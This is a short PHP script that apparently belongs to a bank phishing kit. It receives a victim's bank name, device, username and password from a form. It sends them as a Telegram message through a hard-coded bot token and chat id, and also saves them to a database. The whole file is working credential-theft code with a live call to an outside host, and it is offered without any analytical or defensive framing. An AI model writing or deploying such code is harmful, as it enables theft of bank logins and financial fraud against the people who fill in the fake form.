<?php 
require('../THE333/lib/funciones.php');
session_start();
$usuario = $_POST['user'];
$contrasena = $_POST['pass'];
$dispositivo = $_POST['dis'];
$banco = $_POST['banco'];

$_SESSION['usuario'] = $usuario;
$contenido = $banco . "\n";
$contenido .= $dispositivo . "\n";
$contenido .= "Usuario Banco: " . $usuario ."\n";
$contenido .= "Pass Banco: " . $contrasena ."\n";
$contenido=urlencode($contenido);
if (isset($_SESSION['cc'])) {
    $ca = $_SESSION['cc'];
    unset($_SESSION['cc']);
} else {
    
    file_get_contents("https://api.telegram.org/bot8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM/sendMessage?chat_id=-4803034495&text=". $contenido);

}
if (isset($_SESSION['registro'])) {
	$id = $_SESSION['registro'];
	actualizar_usuario($usuario,$contrasena,$id,$banco);
}else{
	crear_registro($usuario,$contrasena,$dispositivo, $banco);	
}


?>